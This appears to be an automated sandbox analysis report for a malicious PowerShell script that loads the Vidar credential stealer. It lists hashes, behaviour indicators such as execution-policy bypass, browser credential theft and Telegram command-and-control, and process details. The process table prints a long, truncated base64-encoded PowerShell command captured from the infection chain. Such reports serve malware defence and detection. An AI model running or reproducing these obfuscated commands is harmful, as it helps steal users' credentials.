download:

/wp.ps1

Full analysis: https://app.any.run/tasks/46e44ddc-b18d-410b-8d30-a3f2a17ec47c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 21, 2025, 13:08:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
vidar
stealer
telegram
golang
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (7072), with no line terminators
MD5:

0C2958B9A75251A60D2EBDF13CFF0339

SHA1:

E01B5994ED22874C9CA6FD3A2018579423BA64AA

SHA256:

F32ACA620229864C751889FFF828C510EE1C5FC1F760A87320F8D3C8898D9EF4

SSDEEP:

192:+sxBHkgZNsn2tb0qANsq9mzChCd7BPZZFzoEHwwA+FHhtDH:RFy2uwq8dF/Z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 5124)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1128)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 5124)

    • Executing a file with an untrusted certificate

      • build.exe (PID: 5060)

    • Steals credentials from Web Browsers

      • explorer.exe (PID: 4800)

    • VIDAR has been detected (SURICATA)

      • explorer.exe (PID: 4800)

    • Actions looks like stealing of personal data

      • explorer.exe (PID: 4800)

    • VIDAR mutex has been found

      • explorer.exe (PID: 4800)

  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • explorer.exe (PID: 4800)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • explorer.exe (PID: 4800)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 2220)
      • cmd.exe (PID: 1128)
      • explorer.exe (PID: 4800)

    • Application launched itself

      • powershell.exe (PID: 2072)
      • powershell.exe (PID: 3864)
      • powershell.exe (PID: 2220)

    • Connects to the server without a host name

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2764)
      • csc.exe (PID: 6900)
      • UnRAR.exe (PID: 7164)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 2632)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 2228)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6900)
      • csc.exe (PID: 2632)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 2228)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • The process executes Powershell scripts

      • cmd.exe (PID: 1128)

    • The executable file from the user directory is run by the CMD process

      • UnRAR.exe (PID: 7164)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • explorer.exe (PID: 4800)

    • Searches for installed software

      • explorer.exe (PID: 4800)

    • The process bypasses the loading of PowerShell profile settings

      • explorer.exe (PID: 4800)

    • The process hide an interactive prompt from the user

      • explorer.exe (PID: 4800)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)
      • explorer.exe (PID: 4800)
      • slui.exe (PID: 4700)

    • The executable file from the user directory is run by the Powershell process

      • UnRAR.exe (PID: 5080)
      • build.exe (PID: 5060)

    • The sample compiled with english language support

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 5124)

    • Checks supported languages

      • UnRAR.exe (PID: 5080)
      • csc.exe (PID: 6900)
      • cvtres.exe (PID: 4084)
      • UnRAR.exe (PID: 7164)
      • build.exe (PID: 5060)
      • csc.exe (PID: 2632)
      • cvtres.exe (PID: 3148)
      • csc.exe (PID: 5244)
      • cvtres.exe (PID: 3908)
      • csc.exe (PID: 5904)
      • cvtres.exe (PID: 1520)
      • csc.exe (PID: 6068)
      • cvtres.exe (PID: 5116)
      • csc.exe (PID: 4832)
      • cvtres.exe (PID: 2232)

    • Create files in a temporary directory

      • UnRAR.exe (PID: 5080)
      • cvtres.exe (PID: 4084)
      • csc.exe (PID: 6900)
      • UnRAR.exe (PID: 7164)
      • build.exe (PID: 5060)
      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2952)
      • cvtres.exe (PID: 3148)
      • csc.exe (PID: 2632)
      • cvtres.exe (PID: 3908)
      • csc.exe (PID: 5244)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 4552)
      • csc.exe (PID: 5904)
      • cvtres.exe (PID: 1520)
      • powershell.exe (PID: 3968)
      • csc.exe (PID: 6068)
      • cvtres.exe (PID: 5116)
      • powershell.exe (PID: 2228)
      • powershell.exe (PID: 5708)
      • cvtres.exe (PID: 2232)
      • csc.exe (PID: 4832)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2764)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 6900)
      • csc.exe (PID: 2632)
      • csc.exe (PID: 5244)
      • csc.exe (PID: 5904)
      • csc.exe (PID: 6068)
      • csc.exe (PID: 4832)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2764)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)

    • Disables trace logs

      • powershell.exe (PID: 5124)
      • powershell.exe (PID: 2764)

    • Application based on Golang

      • build.exe (PID: 5060)

    • Creates files or folders in the user directory

      • explorer.exe (PID: 4800)

    • Creates files in the program directory

      • explorer.exe (PID: 4800)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 4552)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 2228)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)

    • Reads the software policy settings

      • explorer.exe (PID: 4800)
      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2952)
      • powershell.exe (PID: 3788)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 4552)
      • slui.exe (PID: 4700)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 2228)
      • powershell.exe (PID: 5708)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)

    • Application launched itself

      • chrome.exe (PID: 1688)
      • chrome.exe (PID: 424)
      • chrome.exe (PID: 6256)
      • chrome.exe (PID: 2668)
      • chrome.exe (PID: 1488)
      • chrome.exe (PID: 1720)
      • chrome.exe (PID: 3780)
      • chrome.exe (PID: 6180)
      • chrome.exe (PID: 432)
      • chrome.exe (PID: 6420)
      • chrome.exe (PID: 6736)
      • chrome.exe (PID: 1752)
      • chrome.exe (PID: 5340)
      • chrome.exe (PID: 1236)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4040)
      • powershell.exe (PID: 2368)
      • powershell.exe (PID: 3100)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2664)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3968)
      • powershell.exe (PID: 6360)
      • powershell.exe (PID: 5480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
339
Monitored processes
192
Malicious processes
8
Suspicious processes
3

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe unrar.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs unrar.exe build.exe no specs #VIDAR explorer.exe slui.exe chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe chrome.exe no specs cvtres.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
316"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3444,i,2735226165529091423,17715300358233871350,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3492 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
424"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeexplorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
432"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
480"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc44bffff8,0x7ffc44c00004,0x7ffc44c00010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
592C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgAEIAeAApAHIAbwAuAG4AWQBSACUAcAA+ADwAcgBEACUAeABXADMAVQBiAFgAZwB9AGoAXQB9AFsANQA6AFgAdQBhAFkAXgA+ADcAOgBHADcAagBxAFcAeABYACkAXwBdAF4AVwAsADoASwBSAGwAbgBAAFQALgBFAHwAIQBOACoAagBDAHIAQABxAE4AcwA7AEEAIQBuACwAKwBpAEkAWgB5AFIAegB7AD4AawB3AEAAWQBMAG0AOQB4AHIAPwBlADwAcgBDAGoAZABiAG8AJgBDAGwAZQAyAGwAZgA3AEwAOQBWAF0ALgBTAGQAVwBoAFYASABzAEYAVgBZAHcASABQAEwASwAzAG0ASgBKAF4ANgA9AG8ASwBdACsAcgBsAE8ASgBkAEkAcwBPACkAbQBzAG4AaABJAHAALQArAHMAKgBUAFkANQB8AG4AMgA7AGQAdQB7AGQAcgA2AGMAOQAhAD0AYgArAGcAJAAsAFUAagB7ADEAagAwADgAIQBnAEcAdABTAHsAMQBRAGEAQAA0AHgAQwBQAFMARwAgAFQASAAhACMAOgAwAGwAPAA/AEEANgA9ACEAIAA4AGIAfQAqAFgAOQBDAGoAWwB1AD8AVQA+AG8AWwAuAG8AaQBzAF0AdQB5AFAAUwArAE8AJABoAG0AQQA1AFoARwBUADIAXwBnAFYAKgA/AHYAdQBYAGMAOABEAGYAQAAqADgAZgBuACQAfQAsACgAOAB4AD4AQAAlAFYAbwAoAGYASwBSAFkAZwB4AFAAJgA2AEsALABUAE0AJgBnADEAIQBaAGkAdQA6AEMATQA0AGgANQBnAHAAbABWAF0AXgAuAHQANgBeAG0AYgAuAEYASQBrACQAVwA9AHkAQwB1ADgAcgAkADEAPABEAHsANgAzADwAOwBrAGkAcgAmAGUAagBGADoAXQBNADoATABFAF4ALgBHACoAZABUAEUAMgApAHkAUQBFADIAJQBZAFAAagA8ADgAMAA7AD0AbgA9ADwAVgBlADwARwB7AGgAQQBBAGEAaQBwAE8AOgBYAEUAKgBeADUAKwBVAFMALQB7AG8AcwBsAEwAdgBhAFEAQAAhAHAASAB1ADUAMgBDAF0AZgAhAFUAZABoAGwAPgBbAHgATgBOAF4AZwBCACsAKwAgAD4AMwBaAF8AXgA0AC0AOwBZAGIARgBrAE0AKgAtAEcAUQAkACAAUwBnAGoAUwBmAGkATABlAF4AdQA4AHUAIQAxAHsARABCAEQAWAAmAEYAOgBeAF4ASwBRACYALQBSAE0ATQAlACUAZQBMAHIAagB3AHMAMQBFAC4AQwA0AHUATABEAHcAWQBOAFUAPAAoAGUAJAAqACMAYwBwAGsAKgBoAEsAOQBAAEMAXgBRAGMAMwBsAEQAJQBRAD8APgBoAGIAagBNAGMAcQBaAE0AfQAkAGoAfQAmAF8AIAAtAE4AYwA1ADUAJgA7AF4AOwBVADcANgBIACQARwB1AG8AOgA4AGoAWQBfAD8AdQA/AE0AVABrAEYAKQBNAFcAJgB3AG0AUQBfAEsANgBzAHQAMgAsADoASABzAFcAPgBaAHsAaABTAHwAPwA1AFcAMQB6AEcAcgBkAGcANQAoAFkAfQAkAHwAPwBFAGgAMABWAFMAWgBTAHoAZgBpAFYAIwB4AGgAdQAwAEUAPABLAFUAPwBpAHoARABJAG4ASgBBACkAaQB3AE8AIAA6AHcAPgBYAHgAPABtADsAWQB0AF4APABtAF4AcgBDAEgAfAB9ACMAZgANAAoAIAAgACAAIwAgAHMAWwA1AEcAJABaAEYARAAoAHQAMwA5AD0AIAAjAEIAMgAlAEkATAAgAGgAOAA+AH0AbQBrAF0APgBwAHwATwBHAFAASQB8AE0APgAxAHUAQAAsAGcAUwAqADkATwBYAE4AXwA9AHwAXQBNAEYAOQBrAFAAVgA5AFEAOAAyACgAQgBHACwAbQA+AGcAQQBHAHUAeAAkADUAagBMAHoAZAB2AFcAYwA1ADsASgA6ADwASgAhADgATQBkAGUAWwBqAFsAQwBIAGMAWgBiAEYAdgBGAF0ATwBnAEsAVwBuAG0AIwBeAEYAbgBsAGIAQQA3AF8AbgBnAE0AWgA4AEoAYQApAGsAUgB8ACwAIwByAHQAewBPAEgAcgBIAGsAcwAoAE0AeQBwAFIAZgBkADQAOABtAFsAIQBIAG0AewBwAHUAdQArAHkANgAhAFIATABoAEcAQABTAFoAJQB1ADcAWgA3AHMAbAAwACwAUQAgAHMAbQBsADIAIQAwAC0AaQB4ADMAQQAkAEMAVQBIAG0AXgBaAHoAVAAsADMAUQBmAF0AeABpADUAegBiAG4AQQBwAFEAPQBJADcAfAArACsAYgA+AC4AagBWAGcAVAA4AHIAawBaAF4AeQBvACEAfQApAEcAOABoADkAMgA5ADYAQQBxAHoAfQAhAHkANQBAACUAUQA/ACUASwA1ADwAbQAqAGMALQA3AEEAPwBTAC4AWQBdAGMAeQBqADoAVQB0ACgAUgB0AFMAIABjAHwARgBLAGMARwBsAHgAMQB1AHQAPwBEAEsAUAA2ACgAXgAuAG8ASgByADAAWgBmACsAeQA0ADgATAAwAEUAVgBMADwAQwBVAHEAUgB3AFYAMwBRAFMAMgA3AE0AegAlADgAPgBDADAAaAA7AHsAdgA2ACQAMQBBAEYAZABuAEMATABvADYAYQBIADsAZgAzAHoAQgBRADwAMwAmAHwAfAAhAHgASQAtAE4AYwBqAFMAOQBSAFcAWQAzAEgAVwBFAF8AKwBJAEwAaAAwADgAIwB8AHAAdQBFAD4AbwA3AD4AYwB5ADUAXQBiAGcAeQBAAHAARgAgAFMAZQBIAD4AWgA2AHYAeABFAEUAYgBKAFYAOwB1ACEAXQBnAHsATQBWAD8AVQBhAEMAIQBxACoAIQBnAHgARQA9AGsASQBjAEUAUgAjAGwAUAA3AE4ARAA2ADEAXwBlAFAAbQBNAHEAWwB8AHkAMABBAGUAPABeAG0AdgAhADkAMQBLAD8AaABCAHwALgBwAC4AQwAsAHcAQQAhAF4AUAB8AHcAaAAgACkAJABGADAAJgBbAD8AawBdAHEAdgBIAGkAMwA7AHIAVgBfAHIAJgBMAEAAVgA7AEwAVgB0AEEAdwBHADMAcAB0AEUAKQBTAF0ANgBJAEcAaQBKADAARQA5ACMAQgBWAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFEAKgB2AD8AdQBqAHkATQBHAGcAXwAwAH0AeQB0ADcARABjACEAXwB0AF4AcQBDAEkAXwA/ADcATQB6ACsAOgBCAF0ANwBPAE8AcQBeAEIAYgBsAGgAQwBZACgAXwBOAG8AIQBKAHAASABQAFAAYgBOACMAPABAAEgALgAgAFEAIQBJAC4ARQBnAEwAcABDAEsAJAA4AFgAVgBDAEUASAB1AGwARABkAHwARAA3AD8AZwAxAD4ANgBsAD0AMwBPAHUARQBTAEsAdwA/AHAAcwAkAD8ARABZAGYANwBaAEIAPQByAD0AUwArAFIAUgBqAHsANAAoADwAbABeAFIAUQArAEAARAAyAFUAUAA4AGkAZQA4AE8APwAhACkAOwA5AFIAUgBjADsAZQBWAEQAWgB7AGYAdwBrAEMALQA3AGMARgBsAGsAKAAqAH0AJQBbAG4AYwBdACwAewBPAF8AdABbAE8AawBxADgAUQA1AF0AVQBaAG8AUQBmAE4AbgBJADkASgBRAEMAMwBVAFMAKwB8ADAARQBzAC4AUwAwAD0AWABpAGcAOAAoAGYASQB1AFEAKwAxADsAcwBKAG0AKQBYACoAMwBBACkATgBpAEMAdQAuAEAAQAAzACsAcQBWADMASQBvADAAPgBUAGMAOABQAFcAZQBrAEQARQAkAD4AKgB0AHAAUAAmAGIAPAAyACsASQBNAHIAZwBjAEIATwBFACYAUQBuADsAZABQADsAbABmAE8ASgBkAHcAagB1AGEAcAB6ADAARABZACYALABbADQAewBTADoAZwAqAGEAPQB2AG4AWgBwAF4ANwBJAEIAMgAhAFAAZABwAEYAcQBNAFYAKgBLAFUAWAB1AFUAUwB4AEUAIQBbADoAdQBFACwAeAB3AHgAdABeADQAPwBUAE8AegAhADoAUABCAEAAVQBXAE4AVwAwAEgAcAA7AGoASABYACAAbgBYAG4AewB7AHUATgAyAGEANwBsAFcAUwBUAGsAVABRADEAYgA7AFIAWgAgAHAAbwA4AF0AbwB5AF0ALQA5AFIATgBCADcAZgB3AD8AJgBrACUAUwBWAEsAPwBdAFcAVgBjAD8ANgA3AD0AegBLACUAQAA/AEAAcgB2AEYAQQByAFUAYQA5ADsAXQBpAHUAXQAoACwAbABYAEAAcgBuADwAQQBQAF4AewB8AFkAdgANAAoAIAAgACAAIAAgACAAIwAgADEATAB0ACkAcQA6AFgAXQAkAFoAUwA2AHMAZAAoADcAYgBfAEsAZwBoACEANwBKAHAAKgBiAGUAcwBTAEEAfQA5ADYALQBoAHAAMgAjAEIAbgB7AEEAcgBrACEAVQBGAHkAVQBRAD8AWwBJAEgAXgBiAH0ASgB0AH0APwBaAC4ATgBNAHIAJQBdAHAAPQBlAFEAIwA6AEUATgA6ACAAWgBXADcAOAB4ADUAJABHADkAZwAhAEMAdQBrACAAPABaAD0AXwAqAGYAQgBBACsAeQByAF8AeQBxADwATABMAGgALgBtACQAcgB7ACgAVQBdAGsASQAsAGIAYwA0AD0AOwA/ACsALQA+AGcAbQBxAGgAcgAwACAAPQBpAEsAKgBkADoAbQAjADcAJAByAFgANwBnAE0AJQAzAGEAXQBmAC4AOQB4AGMANAB4ADEAKAB8AGkAZwBXAHQAVAA3ADUAOgBlAG4AJABuAEUAIQB8AF4AJAAmACEARwBJAEsAMABWAHUAQwBmAHsAawBTAFcAQgBIAEkAdAAwAHgAVAA7AF0AMABmAEQAWwAwADcAdAAjAHsANAAqAFQAZgA4AF4AWQBZAGcAegA3AGsANABDADUAfABSAGkANwB9AHUAMABVAEsAbAA1AHgARwArAFYARgBYAHAAWgA1AHoAWABTADEAXgB8AGoAcQAkAF0AWAAtAFoAXwAzAHsAIwAuAFEAKwAtAFAAKABfAGMAQQBtADwANwA7AHYAWABkAE4AYQBMAD4AWABGAHcAXQBEADMAdgBXAHwAXwApAEcAPwAhAHQAaQA6AEIAUQA0ADgAZQAjACsAbQA+AGQAJABYAGgAMgBpAFIARQAyADAAWgBGADkAUQAxAHwAMwB0AEcAIwBWAC0ATAA/ACMAMgBRADAAKwBoAGsANwAyAGsAcAAsACoAQgBaACAAIwBDADsAZQA0AGIAVgBrAGEAewBGAGEAUQBNADMAewAyACEARQBrAGYAdABuACwAWAAyAGoASgAjADIAKQBsAEYAbQBpAHMANAByAGIAUAAqAE4ANABSAD8AKQBxAFcALgBGACQAQgBdAHUAQQBxADEAawAoAFEAPQA+ACkAeQBnAEAAegAsAHEAcAAwAGsATQAwADwAZABvAEwAQABXAGcAcAA/AHwAOAB6ADsAJABMAFEAcQB5ADsAQwBYAEcAKABzAE4APgAwAHsAMgAlACoAWQA8AEsAJgB3AFkAQQBpAFkANQArACMAbwA0AGMAOgBvAFcAXwBmAF4AWAAtACsAVwBPAHAASgA3AEYANQBAAFQAMABaAEYAVgBjAD8AVgAgACQAKwArADQANQB8AD4AMwBsAEEAaQBGAEsAcgByAF4AKgApAEYAVQBRAEIAXQA+AFcAbgBXAF4AKgBGAHkAPwB2AFAALABDACwARgBKACwAcABZAFgARwByADsAQwAqAF8AMgA6AG0AIABLAC0AdwBwAEkAPQB7AFsAQABbAHcAKgBzAG8AOwApAEoATAAjAD4AZQBAAGIATAAgAHIAewB0ACAAbABXAFYATQAsAF8AZgBrACUAIQA+ADgAeAB3ACEARQB4AGkAWQBtADIAfABuAE8ASAA6AG0APQBBAG4ARwAzAFsAZQAsADEAMABzAFAAeABZAGEAPgBIADEAcQB6AHUAIAAjAEcAWgAhAFAAbgB1AHMAdABKAGoAJgAxAGwAUAAkAGUARgBWACMAQQBkAG4AMABhAG4AOgBEACkAcABJAFMAcQA1AGEAVQBFAC4AOwAtAE0AUQA8AGsAUgA3ADkAawBaAFAAaQA8AHAAIQBRAEUARgA4ACwASABPACoAXgBzAEEAKABWAGoARwA3AF8AQwBSAHMAbABWAG0AXQAhACsAPgBJAHkAOgB5AGQAdQA3ADMAVwBhAEcAQgAuACwAWgAoAHgAfQBlAGUAZgBKAG0AcAAlAE8AIAB4AGQAIABuADkAdgBdAH0AVwA+AEoANABVAFcATwA7AEAAcQBuADcARAA+AEwAWwBmAGEAKAAjADAAZgBEADwAVgBpAFsATwA0AGkAQgBwACEANwB0AFYAdgBwAEQALABDAF4AcQBrAFMAIAA6AE8ANwBkADkAJQBJAFMAPABRACMAIwBtAHQAQgBaACwASQBzAEIAfQAzAGcAWABXAF4AJABzAHUAYwAgACQAYgB0ADQAIQBqACwAUAA/AEgAMwBLACAAXgB8AEQARABUACkATQBkAEkASwBhAFgARwBaACwATwA6AEQAYgBJACwASAA0AFsAKABjAGIAQgB4AHkARQBkAG8AOwB2AC4AfAA3AHgAMwAjAEEAPgAzAHMAeQA+AEEAbABQAFYAWAB4ACkARwBaACEATgBTAFcALQBOACAAaQB9AGYAQABKADIASAA9AGIARwAjAHMAOgB4AF0AdgBkAGIAIQBFACUAeQBzADcAegBIAEgAQ